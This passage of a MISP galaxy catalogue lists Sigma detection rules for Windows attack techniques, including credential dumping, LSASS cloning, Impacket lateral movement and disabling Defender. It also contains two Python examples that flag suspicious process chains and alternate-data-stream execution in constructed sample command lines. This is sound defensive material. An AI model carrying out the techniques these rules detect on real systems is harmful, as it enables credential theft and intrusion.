Terminal Service Process Spawn

Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)

The tag is: misp-galaxy:sigma-rules="Terminal Service Process Spawn"

Terminal Service Process Spawn has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 10327. Table References

Links

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml

Abused Debug Privilege by Arbitrary Parent Processes

Detection of unusual child processes by different system processes

The tag is: misp-galaxy:sigma-rules="Abused Debug Privilege by Arbitrary Parent Processes"

Abused Debug Privilege by Arbitrary Parent Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 10328. Table References

Links

https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml
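
The four parent/child rules above ("Suspect Svchost Activity", "Suspicious WmiPrvSE Child Process", "Terminal Service Process Spawn" and "Abused Debug Privilege by Arbitrary Parent Processes") all key on the same four fields of a process-creation event: Image, CommandLine, ParentImage and ParentCommandLine. The Python below is an added example written for this page, not code from SigmaHQ or MISP. A single evaluate() function applies this example's own reading of each check to constructed sample events and returns the names of the checks that fire. The child-process and privileged-parent sets are the example's choices, not the rules' exact filters, and the TermService check flags every child on purpose; allowlisting is environment-specific.

```python
import re
from pathlib import PureWindowsPath

# Binaries that are unusual children of WMI, terminal-service or core system processes.
# This set is the example's own choice, not the rules' exact filters.
INTERACTIVE_OR_LOLBIN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "regsvr32.exe", "rundll32.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe",
}
# Core processes an attacker holding SeDebugPrivilege can open and name as a spoofed parent.
PRIVILEGED_PARENTS = {"winlogon.exe", "lsass.exe", "csrss.exe", "smss.exe", "wininit.exe", "services.exe"}


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list:
    """Return the names of the checks an event trips (empty list = nothing unusual)."""
    image = _basename(event["Image"])
    parent = _basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    parent_cmd = event.get("ParentCommandLine", "")
    hits = []

    # Suspect Svchost Activity: services.exe always launches svchost with "-k <group>",
    # so a bare svchost.exe is typically a host created by malware for code injection.
    if image == "svchost.exe" and not re.search(r"\s-k(?:\s|$)", cmd, re.IGNORECASE):
        hits.append("svchost_without_service_group")

    # Suspicious WmiPrvSE Child Process: the WMI Provider Host launching a shell or LOLBin.
    if parent == "wmiprvse.exe" and image in INTERACTIVE_OR_LOLBIN:
        hits.append("wmiprvse_spawned_lolbin")

    # Terminal Service Process Spawn: the svchost hosting TermService should not be
    # creating processes itself; any child is flagged here (allowlist per environment).
    if parent == "svchost.exe" and re.search(r"termsvcs|termservice", parent_cmd, re.IGNORECASE):
        hits.append("termservice_host_spawned_child")

    # Abused Debug Privilege by Arbitrary Parent Processes: a shell whose parent is a
    # core system process is the classic PPID-spoofing / SeDebugPrivilege footprint.
    if parent in PRIVILEGED_PARENTS and image in INTERACTIVE_OR_LOLBIN:
        hits.append("privileged_parent_spawned_lolbin")
    return hits


def _ev(image, cmd, parent, parent_cmd):
    return {"Image": image, "CommandLine": cmd, "ParentImage": parent, "ParentCommandLine": parent_cmd}


SYS32 = r"C:\Windows\System32"
# Constructed sample events for this example (not real telemetry).
SAMPLE_EVENTS = [
    _ev(SYS32 + r"\svchost.exe", "svchost.exe -k netsvcs -p -s Schedule", SYS32 + r"\services.exe", "services.exe"),
    _ev(SYS32 + r"\svchost.exe", "svchost.exe", r"C:\Users\bob\AppData\Local\Temp\update.exe", "update.exe"),
    _ev(SYS32 + r"\cmd.exe", "cmd.exe /c whoami", SYS32 + r"\wbem\WmiPrvSE.exe", "wmiprvse.exe -secured -Embedding"),
    _ev(SYS32 + r"\WerFault.exe", "WerFault.exe -u -p 4321 -s 200", SYS32 + r"\wbem\WmiPrvSE.exe", "wmiprvse.exe -secured -Embedding"),
    _ev(SYS32 + r"\cmd.exe", "cmd.exe", SYS32 + r"\svchost.exe", "svchost.exe -k termsvcs -s TermService"),
    _ev(SYS32 + r"\cmd.exe", "cmd.exe /c whoami", SYS32 + r"\winlogon.exe", "winlogon.exe"),
    _ev(SYS32 + r"\userinit.exe", "userinit.exe", SYS32 + r"\winlogon.exe", "winlogon.exe"),
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(f"{_basename(event['ParentImage']):>14} -> {_basename(event['Image']):<14} {evaluate(event) or 'ok'}")
```

The two winlogon.exe samples show the tuning point for the debug-privilege check: userinit.exe is a legitimate child of winlogon.exe and must not fire, whereas cmd.exe under winlogon.exe has no benign explanation. Note that the checks see only what the event records; a spoofed parent looks identical to a real one in ParentImage, which is exactly why the child's identity, not the parent's, carries the signal here.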

Direct Autorun Keys Modification

Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.

The tag is: misp-galaxy:sigma-rules="Direct Autorun Keys Modification"

Direct Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 10329. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml

Raccine Uninstall

Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.

The tag is: misp-galaxy:sigma-rules="Raccine Uninstall"

Raccine Uninstall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10330. Table References

Links

https://github.com/Neo23x0/Raccine

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml

SQLite Firefox Profile Data DB Access

Detects usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers, for potential data stealing.

The tag is: misp-galaxy:sigma-rules="SQLite Firefox Profile Data DB Access"

SQLite Firefox Profile Data DB Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10331. Table References

Links

https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml

Rundll32 Execution With Uncommon DLL Extension

Detects the execution of rundll32 with a command line that doesn’t contain a common extension

The tag is: misp-galaxy:sigma-rules="Rundll32 Execution With Uncommon DLL Extension"

Rundll32 Execution With Uncommon DLL Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10332. Table References

Links

https://twitter.com/mrd0x/status/1481630810495139841?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml

Dumping of Sensitive Hives Via Reg.EXE

Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.

The tag is: misp-galaxy:sigma-rules="Dumping of Sensitive Hives Via Reg.EXE"

Dumping of Sensitive Hives Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 10333. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md

https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets

https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml

Remote Access Tool - AnyDesk Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - AnyDesk Execution"

Remote Access Tool - AnyDesk Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10334. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml

Suspicious SYSTEM User Process Creation

Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)

The tag is: misp-galaxy:sigma-rules="Suspicious SYSTEM User Process Creation"

Suspicious SYSTEM User Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10335. Table References

Links

Internal Research

https://tools.thehacker.recipes/mimikatz/modules

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml

Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate

Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Before version 8.0.8, the AnyDesk application used a signing certificate that was compromised by threat actors. Use this rule to detect instances of older AnyDesk versions using the compromised certificate; this is recommended in order to avoid attackers leveraging the certificate to sign their binaries and bypass detections.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate"

Table 10337. Table References

Links

https://anydesk.com/en/changelog/windows

https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml

Execute From Alternate Data Streams

Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection

The tag is: misp-galaxy:sigma-rules="Execute From Alternate Data Streams"

Execute From Alternate Data Streams has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10338. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml
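
The NTFS rules "Suspicious Diantz Alternate Data Stream Execution", "Use NTFS Short Name in Image" and this one all reduce to recognising two path shapes: a stream separator after the file name (file.ext:stream) and an 8.3 short-name component (DOWNLO~1). The Python below is an added example written for this page, not code from SigmaHQ or MISP. path_flags() classifies a single Windows path, handling the drive-letter colon and the \\?\ extended-length prefix so that neither is mistaken for a stream, and scan_event() applies it to the Image field and to every drive-rooted token of the command line. The short-name regex and the sample events are the example's own constructions.

```python
import re

# One 8.3 path component: up to six name characters, a tilde, a number and an optional
# three-character extension (e.g. PROGRA~1, INVOIC~1.EXE). This regex is the example's own.
SHORT_NAME_SEGMENT = re.compile(r'^[^\\/:*?"<>|.\s]{1,6}~\d+(?:\.[^\\/:*?"<>|.\s]{1,3})?$', re.IGNORECASE)
DRIVE_PREFIX = re.compile(r"^[A-Za-z]:\\")
EXTENDED_PREFIX = "\\\\?\\"


def path_flags(path: str) -> set:
    """Return {"ads"}, {"short_name"}, both or an empty set for a single Windows path."""
    body = path
    if body.startswith(EXTENDED_PREFIX):
        body = body[len(EXTENDED_PREFIX):]   # \\?\C:\...  ->  C:\...
    if DRIVE_PREFIX.match(body):
        body = body[2:]                      # drop "C:" so the drive colon is not read as a stream separator
    flags = set()
    if ":" in body:                          # file.ext:stream  or  file.ext:stream:$DATA
        flags.add("ads")
    if any(SHORT_NAME_SEGMENT.match(seg) for seg in body.split("\\")):
        flags.add("short_name")
    return flags


def scan_event(image: str, cmdline: str) -> dict:
    """Flag the Image field and every drive-rooted path token in the CommandLine field.

    Tokenising on whitespace is deliberately simple: a quoted path containing a space is
    split in two, which only costs a miss on its second half. URLs (https://...) are never
    drive-rooted, so their colon never reaches the ADS check.
    """
    flags = {"image": path_flags(image), "cmdline": set()}
    for token in cmdline.replace('"', "").split():
        if DRIVE_PREFIX.match(token) or token.startswith(EXTENDED_PREFIX):
            flags["cmdline"] |= path_flags(token)
    return flags


# Constructed (Image, CommandLine) pairs for this example (not real telemetry).
SAMPLE_EVENTS = {
    "rundll32_ads": (r"C:\Windows\System32\rundll32.exe",
                     r"rundll32.exe C:\Users\bob\notes.txt:hidden.dll,Start"),
    "diantz_ads": (r"C:\Windows\System32\diantz.exe",
                   r"diantz.exe C:\Users\bob\invoice.pdf C:\Users\bob\invoice.pdf:payload.cab"),
    "short_name_image": (r"C:\Users\bob\DOWNLO~1\INVOIC~1.EXE",
                         r"C:\Users\bob\DOWNLO~1\INVOIC~1.EXE"),
    "benign_service": (r"C:\Windows\System32\svchost.exe",
                       r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
    "benign_url": (r"C:\Program Files\Example\app.exe",
                   r'"C:\Program Files\Example\app.exe" https://example.invalid/update'),
}

if __name__ == "__main__":
    for name, (image, cmdline) in SAMPLE_EVENTS.items():
        print(f"{name:17} {scan_event(image, cmdline)}")
```

The short-name check is the noisier of the two: installers and older software legitimately pass PROGRA~1-style paths, so in production it is worth restricting it to the Image field or to user-writable directories, while the ADS check on the command line is rarely benign and can stand on its own.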

Format.com FileSystem LOLBIN

Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs

The tag is: misp-galaxy:sigma-rules="Format.com FileSystem LOLBIN"

Table 10339. Table References

Links

https://twitter.com/0gtweet/status/1477925112561209344

https://twitter.com/wdormann/status/1478011052130459653?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_format.yml

Recon Command Output Piped To Findstr.EXE

Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via "/c" or "/k", for example. Attackers often use this to extract the specific information they require in their chain.

The tag is: misp-galaxy:sigma-rules="Recon Command Output Piped To Findstr.EXE"

Recon Command Output Piped To Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 10340. Table References

Links

https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf

https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html

https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml

Sensitive File Access Via Volume Shadow Copy Backup

Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)

The tag is: misp-galaxy:sigma-rules="Sensitive File Access Via Volume Shadow Copy Backup"

Sensitive File Access Via Volume Shadow Copy Backup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10341. Table References

Links

https://twitter.com/vxunderground/status/1423336151860002816?s=20

https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/

https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sensitive_file_access_shadowcopy.yml

Potential Credential Dumping Via LSASS Process Clone

Detects a suspicious LSASS process clone that could be a sign of credential dumping activity

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Via LSASS Process Clone"

Potential Credential Dumping Via LSASS Process Clone has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10342. Table References

Links

https://twitter.com/SBousseaden/status/1464566846594691073?s=20

https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/

https://twitter.com/Hexacorn/status/1420053502554951689

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml

Suspicious Provlaunch.EXE Child Process

Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

The tag is: misp-galaxy:sigma-rules="Suspicious Provlaunch.EXE Child Process"

Suspicious Provlaunch.EXE Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10343. Table References

Links

https://twitter.com/0gtweet/status/1674399582162153472

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml

HackTool - Potential Impacket Lateral Movement Activity

Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework

The tag is: misp-galaxy:sigma-rules="HackTool - Potential Impacket Lateral Movement Activity"

HackTool - Potential Impacket Lateral Movement Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 10344. Table References

Links

https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py

https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html

https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py

https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py

https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml

Winrar Compressing Dump Files

Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

The tag is: misp-galaxy:sigma-rules="Winrar Compressing Dump Files"

Winrar Compressing Dump Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10345. Table References

Links

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml

Registry Modification Via Regini.EXE

Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.

The tag is: misp-galaxy:sigma-rules="Registry Modification Via Regini.EXE"

Registry Modification Via Regini.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10346. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regini/

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml

Suspicious CMD Shell Output Redirect

Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location

The tag is: misp-galaxy:sigma-rules="Suspicious CMD Shell Output Redirect"

Suspicious CMD Shell Output Redirect has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10347. Table References

Links

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml

File Download Via Bitsadmin To An Uncommon Target Folder

Detects usage of bitsadmin downloading a file to an uncommon target folder

The tag is: misp-galaxy:sigma-rules="File Download Via Bitsadmin To An Uncommon Target Folder"

File Download Via Bitsadmin To An Uncommon Target Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10349. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml

Suspicious Network Command

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

The tag is: misp-galaxy:sigma-rules="Suspicious Network Command"

Suspicious Network Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 10350. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml

PUA - Potential PE Metadata Tamper Using Rcedit

Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.

The tag is: misp-galaxy:sigma-rules="PUA - Potential PE Metadata Tamper Using Rcedit"

PUA - Potential PE Metadata Tamper Using Rcedit has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10351. Table References

Links

https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915

https://github.com/electron/rcedit

https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml

Powershell Defender Disable Scan Feature

Detects requests to disable Microsoft Defender features using PowerShell commands

The tag is: misp-galaxy:sigma-rules="Powershell Defender Disable Scan Feature"

Powershell Defender Disable Scan Feature has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10352. Table References

Links

https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files

https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps

https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml

Binary Proxy Execution Via Dotnet-Trace.EXE

Detects commandline arguments for executing a child process via dotnet-trace.exe

The tag is: misp-galaxy:sigma-rules="Binary Proxy Execution Via Dotnet-Trace.EXE"

Binary Proxy Execution Via Dotnet-Trace.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10353. Table References

Links

https://twitter.com/bohops/status/1740022869198037480

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml

Use of Scriptrunner.exe

The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting

The tag is: misp-galaxy:sigma-rules="Use of Scriptrunner.exe"

Use of Scriptrunner.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10354. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml

Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)

Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots, etc.

The tag is: misp-galaxy:sigma-rules="Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)"

Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10355. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml

Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE

Detects usage of cmdkey to look for cached credentials on the system

The tag is: misp-galaxy:sigma-rules="Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE"

Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 10356. Table References

Links

https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation

https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey

https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml

Suspicious WMIC Execution Via Office Process

Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).

The tag is: misp-galaxy:sigma-rules="Suspicious WMIC Execution Via Office Process"

Suspicious WMIC Execution Via Office Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10357. Table References

Links

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi(aka_REvil)_Ransomware.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml

File Download Via Bitsadmin To A Suspicious Target Folder

Detects usage of bitsadmin downloading a file to a suspicious target folder

The tag is: misp-galaxy:sigma-rules="File Download Via Bitsadmin To A Suspicious Target Folder"

